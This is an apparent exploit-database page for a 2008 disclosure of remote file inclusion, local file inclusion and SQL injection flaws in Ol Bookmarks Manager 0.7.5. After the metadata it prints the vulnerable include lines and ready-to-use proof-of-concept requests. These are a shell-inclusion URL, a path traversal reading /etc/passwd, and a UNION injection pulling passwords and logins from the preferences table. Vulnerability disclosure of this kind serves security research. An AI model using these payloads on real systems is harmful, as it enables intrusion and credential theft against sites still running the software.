header-logo
Suggest Exploit
vendor:
Ol Bookmarks Manager
by:
Tryag.cc/cc
7.5
CVSS
HIGH
RFI, LFI, SQL Injection
89, 78, 79
CWE
Product Name: Ol Bookmarks Manager
Affected Version From: 2000.7.5
Affected Version To: 2000.7.5
Patch Exists: NO
Related CWE: N/A
CPE: a:olbookmarks:ol_bookmarks_manager:0.7.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities

The Ol Bookmarks Manager 0.7.5 is vulnerable to RFI, LFI and SQL Injection. The RFI vulnerability exists in the frame.php file in line 46, where the application includes a file specified in the framefile parameter. The LFI vulnerability exists in the read/frame.php file in line 46, where the application includes a file specified in the framefile parameter. The SQL Injection vulnerability exists in the read/index.php file, where the application is vulnerable to a SQL injection attack when the name and id parameters are supplied.

Mitigation:

Input validation should be used to prevent RFI, LFI and SQL Injection attacks.
Source

Exploit-DB raw data:

#########################################
Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
#########################################
POC & Vulns
RFI In (frame.php) In Line 46
	include "$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=[Shell]
#########################################
LFI In (/read/frame.php) In Line 46
	include "../$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=../../../../../../etc/passwd
#########################################
SQL Injection In /read/index.php?name=brian&id=
Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences--
#########################################
Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG 

# milw0rm.com [2008-09-24]

Navigation

Suggest Exploit

Services By CQR